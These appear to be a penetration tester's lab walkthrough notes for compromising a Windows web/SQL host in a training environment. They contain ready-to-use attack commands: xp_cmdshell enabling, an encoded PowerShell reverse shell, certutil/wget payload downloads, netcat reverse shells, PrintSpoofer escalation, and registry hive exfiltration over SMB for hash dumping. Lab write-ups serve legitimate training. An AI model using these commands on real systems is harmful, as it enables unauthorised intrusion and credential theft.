# nmap scans
- light ![[images/Pasted image 20260701203330.png]]
- create `ports.txt` ![[images/Pasted image 20260701203353.png]]
- detailed ![[images/Pasted image 20260701203641.png]]
---
# Port 445 (SMB)
- null auth
- `nxc smb` ![[images/Pasted image 20260701204126.png]]
- `smbclient` ![[images/Pasted image 20260701204157.png]]
---
# Port 111, 2049 (NFS)
- enum mounts ![[images/Pasted image 20260701205023.png]]
- mount the share
```bash
mkdir nfs
sudo mount -t nfs 172.16.8.20:/DEV01 ./nfs/ -o rw
```
- browse share ![[images/Pasted image 20260701205352.png]]
- `CKEditor` has a github: [CKEditorProvider/Install/Dnn.CKEditorDefaultSettings.xml at development · DNN-Connect/CKEditorProvider · GitHub](https://github.com/DNN-Connect/CKEditorProvider/blob/development/Install/Dnn.CKEditorDefaultSettings.xml)
- `web.config` has creds for `Administrator` ![[images/Pasted image 20260701205537.png]]
---
# Port 80 (http; IIS httpd 10.0)
- visit page ![[images/Pasted image 20260701204305.png]]
- this is a DotNetNuke CMS
- register test user ![[images/Pasted image 20260701204352.png]]
- will check later![[images/Pasted image 20260701204434.png]]
- maybe a way to grab and NTLMv2? but we are not uploading a file
- login with creds from NFS
- we have access to a super user account ![[images/Pasted image 20260702135140.png]]
- admin logs ![[images/Pasted image 20260702135259.png]]
- there is an SQL console ![[images/Pasted image 20260702135646.png]]
## Abuse SQL Console
- enter below and run script to enable xp_cmdshell
```mssql
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
```
- now run below
```mssql
xp_cmdshell 'whoami'
```
![[images/Pasted image 20260702135958.png]]
- `nt servce\mssql$sqlexpress` has the `SeImpersonatePrivilege`
---
# Shell as `nt service\mssql`
## powershell revshell
- create a base64 encoded powershell revshell
```mssql
xp_cmdshell "powershell -ep bypass -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA1AC4AMQAxADQAIgAsADkAMAAwADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
```
- limited to 128 chars ![[images/Pasted image 20260702140818.png]]
## `nc64.exe`
- host `nc64.exe` from Kali and download to `c:\programdata`
- no hit on http server
```mssql
xp_cmdshell "certutil -urlcache -split -f http://10.10.15.114:8000/nc64.exe c:\programdata\nc64.exe"
```
- wget
- got a hit on http server
```mssql
xp_cmdshell "powershell.exe -c wget http://172.16.8.120:9003/nc64.exe -outfile c:\programdata\nc64.exe"
```
![[images/Pasted image 20260702142321.png]] ![[images/Pasted image 20260702142325.png]]
- run `c:\programdata\nc64.exe` from xp_cmdshell
```mssql
xp_cmdshell "c:\programdata\nc64.exe 10.10.15.114 9001 -e cmd"
```
![[images/Pasted image 20260702142549.png]]
- incompatibility error
- run `systeminfo`![[images/Pasted image 20260702142734.png]]
## `nc.exe`
- let's try `nc.exe`
```mssql
xp_cmdshell "powershell.exe -c wget http://172.16.8.120:9003/nc.exe -outfile c:\programdata\nc.exe"
xp_cmdshell "c:\programdata\nc.exe 172.16.8.120 9001 -e cmd"
```
- we have a shell ![[images/Pasted image 20260702143015.png]]
## potato attack
- from here we can run a potato attack
- move `PrintSpoofer64.exe` to target
```cmd
certutil -urlcache -split -f http://172.16.8.120:9003/PrintSpoofer64.exe c:\programdata\spoofer.exe
```
- execute attack
```cmd
.\spoofer.exe -c ".\nc.exe 172.16.8.120 9002 -e cmd"
```
- shell as `nt authority\system` ![[images/Pasted image 20260702143826.png]]
---
# shell as `nt authority\system`
- save sam, system security hives
```cmd
reg.exe save hklm\sam C:\programdata\sam.save
reg.exe save hklm\system C:\programdata\system.save
reg.exe save hklm\security C:\programdata\security.save
```
- setup smbserver with creds on Kali
- initially did not work without username and password based on below error ![[images/Pasted image 20260702145339.png]]
```bash
sudo impacket-smbserver share -smb2support share/ -user test -password test
```
- exfil hives back to Kali
```cmd
net use n: \\172.16.8.120\share /user:test test #mount share
move sam.save n:\
move system.save n:\
move security.save n:\
```
![[images/Pasted image 20260702145439.png]]
- good to go ![[images/Pasted image 20260702145433.png]]
- extract hashes
```bash
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
```
![[images/Pasted image 20260702145717.png]]
- save to file `dev01.hashes`
- we have DCC2 for domain user: `inlanefreight.local/hporter`
## `evil-winrm`
- we have durable access via `evil-winrm` ![[images/Pasted image 20260702150218.png]]
- networking info ![[images/Pasted image 20260702150325.png]]
- check for all flags
```powershell
Get-ChildItem -Path C:\ -Filter "flag.txt" -Recurse -ErrorAction SilentlyContinue
```
- password we found in cleartext from the hash dump belongs to `hporter`
- we have a valid domain account ![[images/Pasted image 20260702150547.png]]